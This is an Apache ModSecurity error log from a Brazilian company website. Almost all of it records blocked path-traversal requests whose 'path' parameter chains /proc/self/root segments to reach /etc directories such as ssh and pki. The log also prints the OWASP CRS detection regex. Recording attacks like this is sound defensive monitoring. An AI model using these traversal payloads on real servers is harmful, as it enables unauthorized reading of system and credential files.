[Fri Mar 20 12:25:44.859792 2026] [:error] [pid 31215:tid 140411540502272] [client 74.7.241.31:43554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1m-AF0L0L-SsrnPo6hGQAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:46.225348 2026] [:error] [pid 11642:tid 140411590858496] [client 74.7.241.31:43570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1m-rninkcc-iUj5AqUagAAA5I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:47.772046 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.241.31:52298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1m-_qxLDW4GITHUkQkLwAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:49.139657 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.241.31:52310] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1m_RCii7xarUs8iHakEgAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:50.537564 2026] [:error] [pid 31215:tid 140411574073088] [client 74.7.241.31:52312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1m_gF0L0L-SsrnPo6hHgAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:51.965250 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.241.31:52324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1m_xCii7xarUs8iHakFQAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:53.297529 2026] [:error] [pid 10189:tid 140411632822016] [client 74.7.241.31:52340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nATJ3M9BSuKP7CAZjRAAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:54.775850 2026] [:error] [pid 11167:tid 140411683178240] [client 74.7.241.31:52350] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nAvHIg5MgXLBnicMtnAAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:57.188150 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:52358] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nBeoXxyEfFpUF8f-5JQAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:25:58.889443 2026] [:error] [pid 31215:tid 140411733534464] [client 74.7.241.31:35470] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nBgF0L0L-SsrnPo6hKAAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:00.203330 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.241.31:35484] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nCAF0L0L-SsrnPo6hKgAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:01.464048 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:35500] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nCeoXxyEfFpUF8f-5KAAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:02.907976 2026] [:error] [pid 11642:tid 140411624429312] [client 74.7.241.31:35512] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nCrninkcc-iUj5AqUcQAAA44"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:04.223027 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.241.31:35516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nDPqxLDW4GITHUkQkOQAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:05.574514 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.241.31:35526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nDTJ3M9BSuKP7CAZjRwAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:06.955407 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.241.31:35536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nDhCii7xarUs8iHakJgAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:08.302985 2026] [:error] [pid 11167:tid 140411590858496] [client 74.7.241.31:39568] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nEPHIg5MgXLBnicMtpAAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:09.395233 2026] [:error] [pid 9818:tid 140411607643904] [client 74.7.243.128:35084] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nEV1pVZ5mVmJwsFNnkAAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:26:09.627270 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.241.31:39570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nEfqxLDW4GITHUkQkOwAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:10.787989 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.244.43:41020] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1nEjJ3M9BSuKP7CAZjSgAAAIg"]
[Fri Mar 20 12:26:10.927669 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:39584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nEuoXxyEfFpUF8f-5KwAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:13.350515 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.241.31:39596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nFfXLqtnMIWvjpaLWewAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
